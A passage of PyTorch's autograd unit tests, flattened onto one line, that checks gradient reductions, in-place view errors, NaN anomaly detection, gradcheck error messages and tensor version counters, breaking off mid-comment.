test_lerp_tensor_weights(self): self._test_lerp_tensor_weights(lambda t: t) def test_reduce_dtype(self): def test_reduction(op, has_no_dim, takes_dtype=True): x = torch.randn(3, 3, dtype=torch.float, requires_grad=True) if has_no_dim: grad1, = torch.autograd.grad([op(x)], [x]) grad2, = torch.autograd.grad([op(x, dtype=torch.double)], [x]) self.assertEqual(grad1, grad2) self.assertEqual(grad2.dtype, torch.float) gi = torch.randn(op(x, dim=0).shape, dtype=torch.float) grad1, = torch.autograd.grad([op(x, dim=0)], [x], gi) if takes_dtype: grad2, = torch.autograd.grad([op(x, dim=0, dtype=torch.double)], [x], gi.double()) else: grad2, = torch.autograd.grad([op(x.double(), dim=0)], [x], gi.double()) self.assertEqual(grad1, grad2) self.assertEqual(grad2.dtype, torch.float) test_reduction(torch.sum, True) test_reduction(torch.prod, True) test_reduction(torch.cumsum, False) test_reduction(torch.cumprod, False) test_reduction(torch.logcumsumexp, False, takes_dtype=False) def test_inplace_view_saved_output(self): # Test an in-place operation on a view in which the in-place op saves # its output. Previously, this created a reference cycle. dealloc = [0] class IncrementOnDelete(object): def __del__(self): dealloc[0] += 1 def test(): root = torch.randn(3, 3, requires_grad=True) copy = root.clone() copy.grad_fn.register_hook(IncrementOnDelete()) view = copy.view(9) torch.nn.functional.relu(view, inplace=True) test() self.assertEqual(dealloc[0], 1) def test_inplace_view_leaf_errors(self): # Issue #21875: Fail faster (when we try to modify the view vs. in backward()) x = torch.zeros(1, requires_grad=True) y = x.view_as(x) with self.assertRaisesRegex(RuntimeError, "a view of a leaf Variable that " "requires grad is being used in " "an in-place operation."): y.add_(1) def test_inplace_view_backward(self): # Issue #10532: Make sure that this does not raise RuntimeError. net = nn.Sequential( nn.InstanceNorm2d(2), nn.ReLU(True) ) x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True) g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True) torch.autograd.grad(g.sum(), [x]) self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]])) # https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8 inputs = torch.ones((1, 3, 256, 256), requires_grad=True) tmp1 = (inputs + 1).view_as(inputs) tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True) prob_interpolated = torch.sigmoid(tmp2) gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs, grad_outputs=torch.ones(prob_interpolated.size()), create_graph=True, retain_graph=True)[0] gradient_penalty = gradients.sum() gradient_penalty.backward() fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0] self.assertEqual(fn.name(), "ThresholdBackwardBackward") def test_inplace_view_weak_grad_fn(self): # Issue 23502: Test that b's grad_fn is preserved. a = torch.arange(10.0, requires_grad=True) b = a.narrow(0, 0, 2).clone().view(-1) b.relu_() c = b.clone() del b gc.collect() s = c.sum() s.backward() self.assertEqual(s, torch.tensor(1.0)) # Issue #21875: Fail faster (when we try to modify the view vs. in backward()) a = torch.rand(10, requires_grad=True).narrow(0, 0, 10) with self.assertRaises(RuntimeError): b = a.relu_() def test_mul_out(self): a = torch.randn(2, 2, requires_grad=True) b = torch.randn(2, 2, requires_grad=True) x = torch.zeros_like(a) # out=... functions don't support automatic differentiation currently self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x)) # the inputs can require grad if we're in no_grad() mode with torch.no_grad(): torch.mul(a, b, out=x) self.assertEqual(x, a * b) def test_mul_out_result_requires_grad(self): a = torch.randn(2, 2) b = torch.randn(2, 2) x = torch.zeros(2, 2, requires_grad=True) # we should throw an exception if the output requires grad self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x)) def test_diagonal_derivative_requires_grad(self): # test that the backward requires grad # we do this is because diagonal_backward uses inplace # operations and gradgradcheck does not catch whether # they works as expected (it will succeed even if # the gradient has requires_grad == False a = torch.randn(5, 6, requires_grad=True) b = torch.diagonal(a)**2 c = b.sum() d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True) self.assertTrue(d.requires_grad) def test_anomaly_detect_nan(self): size = 10 class MyFunc(Function): @staticmethod def forward(ctx, inp1, inp2, fail_0th): ctx.fail_0th = fail_0th return inp1.sum(0, keepdim=True) @staticmethod def backward(ctx, gO): gI = gO.clone().expand(size) gI[0] = 0 gI[0] /= 0 # Generate a nan if ctx.fail_0th: return gI, None, None else: return None, gI, None inp = torch.rand(size, requires_grad=True) out = MyFunc.apply(inp, inp, True) out.backward() # Should not fail inp = torch.rand(size, requires_grad=True) out = MyFunc.apply(inp, inp, True) with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."): with warnings.catch_warnings(record=True) as w: with detect_anomaly(): out.backward() self.assertIn('No forward pass information', str(w[0].message)) inp = torch.rand(size, requires_grad=True) with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."): with warnings.catch_warnings(record=True) as w: with detect_anomaly(): out = MyFunc.apply(inp, inp, False) out.backward() self.assertIn('MyFunc.apply', str(w[0].message)) def test_nested_anomaly_detect_nan(self): size = 10 class MyFunc(Function): @staticmethod def forward(ctx, inp1, fail_0th): ctx.fail_0th = fail_0th ctx.save_for_backward(inp1) return inp1.sum(0, keepdim=True) @staticmethod def backward(ctx, gO): inp, = ctx.saved_tensors fail_0th = ctx.fail_0th g = gO.clone().expand(size) gI = MyFunc2.apply(g * inp, g + inp, fail_0th) return gI, None class MyFunc2(Function): @staticmethod def forward(ctx, inp1, inp2, fail_0th): ctx.fail_0th = fail_0th return inp1 * 2.0 + inp2 @staticmethod def backward(ctx, gO): fail_0th = ctx.fail_0th g1 = gO.clone() g2 = gO.clone() g1[0] = 0 g2[0] = 0 # generate a nan if fail_0th: g1[0] /= 0 else: g2[0] /= 0 return g1, g2, None inp = torch.rand(size, requires_grad=True) out = MyFunc.apply(inp, True) ginp, = torch.autograd.grad(out, (inp,), create_graph=True) gsum = ginp.sum() gsum.backward() # should not fail inp = torch.rand(size, requires_grad=True) out = MyFunc.apply(inp, True) ginp, = torch.autograd.grad(out, (inp,), create_graph=True) gsum = ginp.sum() with warnings.catch_warnings(record=True) as w: with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."): with detect_anomaly(): gsum.backward() self.assertIn('No forward pass information', str(w[1].message)) inp = torch.rand(size, requires_grad=True) with warnings.catch_warnings(record=True) as w: with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."): with detect_anomaly(): out = MyFunc.apply(inp, False) ginp, = torch.autograd.grad(out, (inp,), create_graph=True) gsum = ginp.sum() gsum.backward() self.assertIn('MyFunc2.apply', str(w[1].message)) self.assertIn('MyFunc.apply', str(w[2].message)) def test_anomaly_grad_warnings(self): # PyTorch won't throw warnings if there is an error # but we'd want to at least see them in stderr class StdErrDiverter: def __enter__(self): self.stderr_orig = sys.stderr self.stderr_new = io.StringIO() sys.stderr = self.stderr_new return self def __exit__(self, *args): self.captured = self.stderr_new.getvalue() sys.stderr = self.stderr_orig # if the warnings don't throw, they will be handled as regular warnings with self.assertRaisesRegex(RuntimeError, "one of the variables needed for gradient computation has been " "modified by an inplace operation"): with warnings.catch_warnings(record=True) as w: with detect_anomaly(): a = torch.randn(5, requires_grad=True) d1 = a + 1 d2 = d1 ** 2 d1 += 1 torch.autograd.grad(d2.sum(), a) self.assertEqual(len(w), 2) self.assertIn('Anomaly Detection has been enabled', str(w[0].message)) self.assertIn('Error detected in PowBackward0', str(w[1].message)) # if the warning throws, it will be printed to sys.stderr with self.assertRaisesRegex(RuntimeError, "one of the variables needed for gradient computation has been " "modified by an inplace operation"): with warnings.catch_warnings(record=True) as w: with detect_anomaly(): warnings.simplefilter("error") with StdErrDiverter() as s: a = torch.randn(5, requires_grad=True) d1 = a + 1 d2 = d1 ** 2 d1 += 1 torch.autograd.grad(d2.sum(), a) self.assertEqual(len(w), 1) self.assertIn('Anomaly Detection has been enabled', str(w[0].message)) self.assertIn('Error detected in PowBackward0', s.captured) def test_anomaly_assign_parent_cleanup(self): # Test that python objects created are properly cleaned up when assign_parent is called import weakref def get_ref(): # we use torch.exp here but any function that will construct a new node in its # backward call in grad mode will work x = torch.randn(2, 2, requires_grad=True) t = x.exp() # ExpBackward calls mul, creating the MulBackward node when create_graph=True. # In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to # MulBackward's anomaly metadata dict, creating the following reference chain: # # grad -> MulBackward -> PyObject -> ExpBackward # with detect_anomaly(): grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True) # We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict # # (PyObject) -> ExpBackward -> dict -> *Foo* # t ----^ WeakRef ---^ # # We want to test that when grad goes out of scope at the end of this function that PyObject is destroyed # We can test this by seeing whether Foo is not kept alive once t is destroyed class Foo(object): pass my_obj = Foo() meta_dict = t.grad_fn.metadata meta_dict[0] = my_obj ref = weakref.ref(my_obj) return t, ref t, ref = get_ref() self.assertIsNotNone(ref()) del t self.assertIsNone(ref()) def test_nested_anomaly_printstack_cleanup(self): # Test if metadata dict PyObject is properly destroyed import weakref def get_ref(): # This is similar to the construction in test_anomaly_assign_parent_cleanup: # # MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo # out ---^ WeakRef ---^ # # We want to check that Foo is still properly destroyed even when MyFunc2Backward's # AnomalyMetadata calls printstack, which does some python object manipulation. # # You might be wondering why we still have to test_anomaly_assign_parent_cleanup, # since if PyObject is not destroyed here, wouldn't this test would detect that also? # The answer is that custom function's PyObject (THPFunction) actually only hold # a weak reference to the c++ node! class MyFunc(Function): @staticmethod def forward(ctx, x): ctx.save_for_backward(x) return x @staticmethod def backward(ctx, gO): x, = ctx.saved_tensors return MyFunc2.apply(x) class MyFunc2(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, gO): return gO + float("NaN") inp = torch.rand(1, requires_grad=True) out = MyFunc.apply(inp) ginp, = torch.autograd.grad(out, (inp,), create_graph=True) with warnings.catch_warnings(record=True) as w: with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."): with detect_anomaly(): ginp.backward() class Foo(object): pass my_obj = Foo() meta_dict = out.grad_fn.metadata meta_dict[0] = my_obj ref = weakref.ref(my_obj) return out, ref t, ref = get_ref() self.assertIsNotNone(ref()) del t self.assertIsNone(ref()) @skipIfNoLapack def test_eig_no_eigenvectors(self): A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True) w, v = torch.eig(A, eigenvectors=False) with self.assertRaisesRegex(RuntimeError, 'is not differentiable'): torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)]) @skipIfNoLapack def test_eig_complex_eigenvalues(self): A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True) w, v = torch.eig(A, eigenvectors=True) with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'): torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)]) @skipIfNoLapack def test_symeig_no_eigenvectors(self): A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True) w, v = torch.symeig(A, eigenvectors=False) with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'): torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)]) @skipIfNoLapack def test_svd_no_singularvectors(self): A = torch.randn(2, 2, dtype=torch.float32, requires_grad=True) u, s, v = torch.svd(A, compute_uv=False) with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'): torch.autograd.backward([u, s, v], [torch.ones_like(u), torch.ones_like(s), torch.ones_like(v)]) def test_no_grad_copy(self): # create autograd function that saves grad pointer as class static class MyFunc(Function): static_grad_ptr = None @staticmethod def forward(ctx, inp1, inp2): return inp1 + inp2 @staticmethod def backward(ctx, grad): MyFunc.static_grad_ptr = grad.data_ptr() return grad, grad class NonContGradFunc(Function): @staticmethod def forward(ctx, inp1): ctx.size = inp1.size() return torch.tensor([1.]) @staticmethod def backward(ctx, grad): return torch.ones(1).expand(ctx.size) a = torch.randn(5, 6, requires_grad=True) b = torch.randn(5, 6, requires_grad=True) # non-contiguous grad should be copied NonContGradFunc.apply(MyFunc.apply(a, b)).backward() self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr) self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr) # test case that should trigger no copy for one of a,b a.grad = b.grad = None MyFunc.apply(a, b)[1][0].backward() p_g = MyFunc.static_grad_ptr p_a = a.grad.data_ptr() p_b = b.grad.data_ptr() # check a,b uses different grad buffer self.assertFalse(p_a == p_b) # check one of them is using the computed buffer self.assertTrue(p_a == p_g or p_b == p_g) def test_no_grad_copy_sparse(self): # create autograd function that saves grad pointer as class static class MyFunc(Function): static_grad_ptr = None @staticmethod def forward(ctx, inp1, inp2): return inp1 + inp2 @staticmethod def backward(ctx, grad): MyFunc.static_grad_ptr = grad._values().data_ptr() return grad, grad class NonContGradFunc(Function): static_grad_ptr = None @staticmethod def forward(ctx, inp1, inp2): return inp1 + inp2 @staticmethod def backward(ctx, grad): # Create a sparse tensor with non-contigous indices and values # and return as grad. v = torch.rand(1, 3) i = torch.ones(1, 1, dtype=torch.long) nv = v.expand(8, 3) ni = i.expand(1, 8) ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3])) NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr() return ngrad, ngrad a = torch.randn(10, 3, requires_grad=True) b = torch.randn(10, 3, requires_grad=True) input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9]) offsets = torch.tensor([0, 4]) import torch.nn.functional as F # test case that should trigger no copy for one of a,b emb_matrix = MyFunc.apply(a, b) loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum() loss.backward(retain_graph=True) p_g = MyFunc.static_grad_ptr p_a = a.grad._values().data_ptr() p_b = b.grad._values().data_ptr() # check a,b uses different grad buffer self.assertFalse(p_a == p_b) # check one of them is using the computed buffer self.assertTrue(p_a == p_g or p_b == p_g) # Run backwards multiple times to ensure accumulation works. for i in range(10): loss.backward(retain_graph=True) # non-contiguous indices and value, we should trigger a copy. a.grad = b.grad = None emb_matrix = NonContGradFunc.apply(a, b) loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum() loss.backward(retain_graph=True) p_g = NonContGradFunc.static_grad_ptr p_a = a.grad._values().data_ptr() p_b = b.grad._values().data_ptr() # check a,b uses different grad buffer self.assertFalse(p_a == p_b) # Verify we cloned both grads. self.assertFalse(p_a == p_g) self.assertFalse(p_b == p_g) # Run backwards multiple times to ensure accumulation works. for i in range(10): loss.backward(retain_graph=True) def test_gradcheck_single_input(self): def check(fast_mode): def f(inp): return inp.mul(5) gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode) gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_sparse_input(self): def check(fast_mode): def fn(sparse): return torch.sparse.sum(sparse) gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode) with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'): gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False, check_batched_grad=False, fast_mode=fast_mode) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_nondeterministic(self): class NonDetFunc(Function): @staticmethod def forward(ctx, x, jitter=0.0): ctx._jitter = jitter return x @staticmethod def backward(ctx, grad_out): return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None def check(fast_mode): inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True) gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode) with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'): gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode) with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'): gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode) gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False, fast_mode=fast_mode) gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False, fast_mode=fast_mode) gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False, fast_mode=fast_mode) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_validates_inputs(self): def check(fast_mode): # when inputs are not dense, but check_sparse_nnz is false x = torch.rand(10, requires_grad=True).to_sparse() with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'): gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False, fast_mode=fast_mode) self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)) # when none of the inputs require grad (always raises even if raise_exception=False) x = torch.rand(10, requires_grad=False) with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'): gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode) # (warning) when inputs are not double precision x = torch.ones(1, dtype=torch.float32, requires_grad=True) with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"): self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode)) # when layout is not mkldnn(aka has strides) and input has a dimension with stride 0. (always raises # even if raise_exception=False) x = torch.ones(1, dtype=torch.float64, requires_grad=True) x = x.expand((2, 2)) with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'): gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode) check(fast_mode=True) check(fast_mode=False) @unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled") def test_gradcheck_test_outputs(self): def check(fast_mode): # when sparse outputs (always raise even if raise_exception=False) x = torch.rand(10, requires_grad=True).to_sparse() with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'): gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False, fast_mode=fast_mode) # when mkldnn outputs (always raise even if raise_exception=False) root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True) with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'): gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_check_no_differentiable_outputs(self): def check(fast_mode): # When none of the outputs are differentiable, but numerical gradient is not zero x = torch.ones((1,), requires_grad=True) with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'): gradcheck(lambda x: torch.tensor([x]), x) self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode)) # succeed when no outputs at all self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode)) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_check_batched_grad(self): def check(fast_mode): x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse() # runtime error while compute batched grad (print big error) with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'): gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode) self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, raise_exception=False, fast_mode=fast_mode)) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_backward_mul_by_grad_output(self): # when grad_input is sparse and has incorrect sparse_dim/dense_dim def check(fast_mode): def fn(x): def hook(grad): if grad is not None: return grad.to_dense().to_sparse(1) return grad y = x.clone() y.register_hook(hook) return y.to_dense() x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse() with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'): gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode) self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)) # when backward not multiplied by grad_output (non-sparse case) def fn2(x): y = x.clone() y.register_hook(lambda x: x + 1e-2) return y x = torch.ones(1, dtype=torch.double, requires_grad=True) with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'): gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode) self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode)) # when backward not multiplied by grad_output (sparse case) def fn3(x): y = x.clone().to_dense() y.register_hook(lambda x: x + 1e-2) return y x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse() with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'): gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode) self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)) # when layout of grad_input is not the same as input class Test(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, x): return x.to_sparse() x = torch.ones(1, dtype=torch.double, requires_grad=True) with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'): gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode) self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_undefined_grad(self): def check(fast_mode): # when encounter runtime error while running backward def fn(x): def hook(x): if x is None: raise RuntimeError("x is undefined") y = x.clone() y.register_hook(hook) return y x = torch.ones(1, dtype=torch.double, requires_grad=True) with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"): with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'): gradcheck(fn, (x,), fast_mode=fast_mode) self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode)) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_jacobian_mismatch(self): def check(fast_mode): def fn(x): # R -> R, C -> C y = x.clone() y.register_hook(lambda x: x + 1e-2) return y x = torch.ones(2, 2, requires_grad=True) with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'): gradcheck(fn, (x,), fast_mode=fast_mode) self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode)) x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128) with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'): gradcheck(fn, (x_c,), fast_mode=False) self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False)) def fn2(x): # R -> C y = torch.complex(x, x) y.register_hook(lambda x: x + 1e-2) return y x = torch.ones(2, 2, requires_grad=True) with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'): gradcheck(fn2, (x,), fast_mode=False) self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False)) def fn3(x): # C -> R y = torch.real(x) y.register_hook(lambda x: x + 1e-2) return y with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'): gradcheck(fn3, (x_c,), fast_mode=False) self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False)) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_dense_and_sparse_inputs(self): def check(fast_mode): def fn(x, y): return x * y.coalesce().to_dense() a = torch.rand(2, 2, dtype=torch.double, requires_grad=True) b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True) self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)) check(fast_mode=True) check(fast_mode=False) @unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled") def test_gradcheck_multiple_mkldnn_inputs(self): def check(fast_mode): def fn(x, y): return x + y.to_dense() a = torch.rand(10, requires_grad=True) b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True) self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode)) def fn2(x, y): return x.to_dense() + y.to_dense() c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True) self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode)) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_output_shape_or_dtype_depend_on_values(self): def check(fast_mode): def fn(x): if torch.all(x >= 1): return torch.cat([x, x]) else: return x a = torch.ones(1, dtype=torch.double, requires_grad=True) with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'): self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode)) def fn2(x): if torch.all(x >= 1): return x.to(torch.float32) else: return x with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'): self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode)) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_complex_non_complex_outputs(self): def fn(x, y): z = torch.complex(x, y) return z, x + 1 a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64) b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64) self.assertTrue(gradcheck(fn, (a, b))) def fn2(z): return z, torch.real(z) c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128) self.assertTrue(gradcheck(fn2, (c))) def test_gradcheck_get_numerical_jacobian(self): # get_numerical_jacobian is deprecated and no longer used internally by gradcheck from torch.autograd.gradcheck import get_numerical_jacobian def fn(inputs): # get_numerical_jacobian requires fn to take inputs as a tuple # and returns the jacobian wrt the first output x = inputs[0] y = inputs[1] return 2 * x + y, x + 2 * y a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64) b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64) with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"): jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6) self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double)) with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"): jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6) self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double)) self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double)) with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"): jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0) def test_gradcheck_get_analytical_jacobian(self): from torch.autograd.gradcheck import get_analytical_jacobian def fn(x, y): return 2 * x + y, x + 2 * y a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64) b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64) outputs = fn(a, b) with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"): jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0]) self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double)) self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double)) self.assertTrue(reentrant) class NonDetFunc(Function): @staticmethod def forward(ctx, x, jitter=0.0): ctx._jitter = jitter return x @staticmethod def backward(ctx, grad_out): return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None outputs = NonDetFunc.apply(a, 1e-6) with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"): jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs) self.assertFalse(reentrant) with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"): jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0) def test_gradcheck_custom_error(self): from torch.autograd.gradcheck import GradcheckError def check(fast_mode): def fn(x): y = x.clone() y.register_hook(lambda x: x + 1e-2) return y x = torch.ones(2, 2, requires_grad=True) with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'): gradcheck(fn, (x,), fast_mode=fast_mode) with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'): gradcheck(fn, (x,), fast_mode=fast_mode) self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode)) def fn2(x): raise RuntimeError("Not a GradcheckError!") # Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"): gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False) check(fast_mode=True) check(fast_mode=False) def test_version_counter(self): x = torch.randn(1, 2) # In-place op bumps version x_saved_version = x._version x.add_(1).add_(1) self.assertTrue(x._version > x_saved_version) # Differentiable view shares version counter xz = x[:] self.assertTrue(x._version == xz._version) xz.add_(1) self.assertTrue(x._version == xz._version) # `x.data = y` preserves version counter of `x` x_saved_version = x._version x.data = torch.randn(2, 3) self.assertTrue(x._version == x_saved_version) x.add_(1) self.assertTrue(x._version > x_saved_version) # Make sure `x` is still using the same version 